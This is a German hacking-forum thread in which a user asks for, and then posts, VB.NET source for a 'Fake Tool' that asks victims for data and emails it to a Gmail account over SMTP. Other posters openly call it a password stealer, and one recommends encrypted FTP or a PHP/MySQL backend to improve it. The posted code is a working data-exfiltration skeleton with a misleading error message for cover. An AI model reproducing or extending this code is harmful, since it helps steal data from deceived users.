Ergebnis 1 bis 10 von 10
  1. #1
    Gesperrt
    Registriert seit
    21.06.2009
    Beiträge
    449

    Standard Art Fake Tool Source für Abfrage proggi

    Hallo Leute also ich muss für meine Firma ein Programm umsetzten undzwar dachte ich einfach daran ein Fake tool umzuschreiben also imprinzip soll es im KFZ berreich eingesetzt werden undzwar soll das program geöffnet werden dort wird der benutzer aufgefordert ebstimmte daten einzugeben und anschließend auf einen sende buttum zu klicken der denn die daten via. smtp oder ftp weiß nicht was sich besser eignet hochläd ... hat vill. einer von euch nen source für mich ? meine proggi kentnisse leider nicht aus hoffe es kann mir jemd. helfen :-) ....


    LG Pr0

  2. #2
    Gesperrt
    Registriert seit
    20.04.2010
    Beiträge
    67

    Standard

    Die Geschichte ist mal mega unglaubwürdig ( make my day !!! ) , warum sollte deine Firma dich mit sowas beauftragen wo du doch offensichtlich keine plan vom programmieren hast? KFZ Bereich ... *lol*
    Generell hört sich dein Vorhaben eher nach einen Pw Stealer für Arme an, als nach einen Programm was irgendwo im KFZ Bereich geschweige denn für eine Firma eingesetzt werden soll.

    Wenn du es umschreiben könntest, könntest du es auch gleich selbst machen.
    Mir ist auch noch nicht so ganz ersichtlich warum es ein Faketool sein soll, das bringt dich doch überhaupt nicht weiter.

    Erstell doch einfach in Visual Basic eine Form und such dir dann die Send Funktionen im Google?

    Wird wohl nix denn:


    meine proggi Kenntnisse leider nicht aus
    Eher überhaupt keine Kenntnisse vorhanden sind. Sowas kannste mit jedem Visual Basic Buch nach 30 Seiten selbst machen.
    OmG !


    Lern programmieren anstatt für Irgendwelche Tools , die einen Schwierigkeitsgrad von unter 0 haben, Irgendwelche Sources zu rippen.
    Scirptkiddy Scheiße Deluxe, echt.


    Gruß

    Snowman, dem für solche Threads ein "Kopf gegen die Wand Smyle" fehlt
    Geändert von Snowman.de.117 (29.04.2010 um 10:03 Uhr)

  3. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    blackberry (01.05.2010), VincentSX (01.05.2010), Zylasty (29.04.2010)

  4. #3
    Gesperrt
    Registriert seit
    21.06.2009
    Beiträge
    449

    Standard

    gut habs selbst gecodet thx für den anstupser

    LG

  5. #4
    Meister des Grills Avatar von c4pone
    Registriert seit
    08.11.2006
    Beiträge
    167

    Standard

    Dann poste doch mal bitte den Sourcecode würde mich ja dann doch mal interessieren
    Zitat Zitat von Barney Stinson
    “Think of me like Yoda, but instead of being little and green I wear suits and I'm awesome. I'm your bro—I'm Broda!”

  6. #5
    Gesperrt
    Registriert seit
    21.06.2009
    Beiträge
    449

    Standard

    jop ein mom

    Code:
    Imports System.Net.Mail
    Public Class Form1
        Private Sub Senden_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Senden.Click
    
    
    
            Try
                Dim newmail As New MailMessage()
                Dim smtpserver As New SmtpClient
                smtpserver.Credentials = New Net.NetworkCredential("", "")
                smtpserver.Port = 587
                smtpserver.Host = "smtp.gmail.com" 
                smtpserver.EnableSsl = True
                newmail.To.Add("")
                newmail.From = New MailAddress("")
                newmail.Body = "Text 6: " & TextBox1.Text & ControlChars.NewLine & "Text 5: " & TextBox2.Text & ControlChars.NewLine & "Text 4: " & TextBox3.Text & ControlChars.NewLine & "Text 3: " & TextBox4.Text & ControlChars.NewLine & "Text 2: " & TextBox5.Text & ControlChars.NewLine & "Text 1: " & TextBox6.Text & ControlChars.NewLine
    
                smtpserver.Send(newmail)
    
    
                TextBox1.Enabled = False
                TextBox2.Enabled = False
                TextBox3.Enabled = False
                TextBox4.Enabled = False
                TextBox5.Enabled = False
                TextBox6.Enabled = False
                Senden.Enabled = False
            Catch ex As Exception
                MsgBox("Fehler sie sind nicht mit dem Internet verbunden", MsgBoxStyle.OkOnly & MsgBoxStyle.Critical, "Error while logging in")
            End Try
    
        End Sub
    End Class
    Büdde natürlich ohne mail addy´s


    // was man noch dazu sagen kann die 6 Text Felder sind für 6 Abfragen zu Fahrzeugdaten dann der Sende Bottum is halt der Sende Bottum wo die Daten dann an die G-Mail addy gesendet werden damit man die in der Firma bei einer anfrage abrufen kann ...

    LG
    Geändert von Pr0h4ck3r (29.04.2010 um 16:22 Uhr)

  7. #6
    Meister des Grills Avatar von c4pone
    Registriert seit
    08.11.2006
    Beiträge
    167

    Standard

    scheint aber für eine sehr kleine firma zu sein wenn diese google mail benutzt ?!
    Zitat Zitat von Barney Stinson
    “Think of me like Yoda, but instead of being little and green I wear suits and I'm awesome. I'm your bro—I'm Broda!”

  8. #7
    Bad Times Virus Avatar von Th3_Cr4xX
    Registriert seit
    28.07.2008
    Beiträge
    646

    Standard

    Warum lügstn hier so ab? Sag doch einfach willstn Stealer coden (bzw Fake Tool) is doch erlaubt

  9. #8
    Behindikindi Avatar von Variable X
    Registriert seit
    22.07.2009
    Beiträge
    399

    Standard

    Naja wie er es nach außen stellt, ist doch seine Sache....
    er sucht Hilfe und die sollte er auch bekommen Leute.

    Hast ja inzwischen selbst was auf die Beine gebracht, mit ftp geht das nciht viel schwerer, nur solltest du den ftp Upload verschlüsseln

    Allgemein solltest du ne Verschlüsselung "drüber legen"... ^^
    Wie man das genau macht, weiß ich aber selbst nicht, damit hab ich mich noch nie beschäftigt xD


    Was aber z.B. auch noch gut wäre und auch sicherer, wäre das ganze vie php z.B. in eine MySQL Datenbank zu speichern, wobei halt entsprechende Kenntnisse vorhanden sein sollten oder erlernt werden müssen...


    Hoffe konnte noch ein wenig helfen, auch wenn du dein Werk getan hast

  10. #9
    Gesperrt
    Registriert seit
    21.06.2009
    Beiträge
    449

    Standard

    Hey Thx giebt ja doch noch sinvolle Beiträge hier ;-) ja denke werde mich mal dransetzten war mir erstmal wichtig war das ich i-was lauffäiges leicht erweiterbares zum laufen gebracht habe...

    LG Pr0

  11. #10
    Behindikindi Avatar von Variable X
    Registriert seit
    22.07.2009
    Beiträge
    399

    Standard

    Gut ^^

    Wie gesagt, dein email Versand ist ja quasi sehr simpel Und erweiterbar ist es in der Tat, und genauso leicht ist es auch umschreibbar, als ftp z.B. ...

    Sind dann nur kleine Änderungen.

    Du bist aber jedenfalls auf dem besten weg, wenn du es selbst machst

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •